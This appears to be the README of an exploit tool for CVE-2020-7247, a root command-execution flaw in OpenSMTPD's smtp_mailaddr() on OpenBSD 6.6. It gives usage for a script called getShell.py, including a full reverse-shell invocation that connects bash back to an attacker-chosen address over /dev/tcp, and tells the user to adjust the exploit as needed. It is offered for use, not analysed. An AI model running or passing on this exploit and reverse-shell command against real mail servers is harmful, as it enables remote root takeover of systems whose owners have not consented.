CVE-2020-7247
This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user
How to use?
python3 getShell.py <targetIp> <targetPort> <command>
If you need a reverse shell then run it like this
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
Important
Change some stuffs in this exploit like RCPT to and something(if needed)
See this article for more clear explaination
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/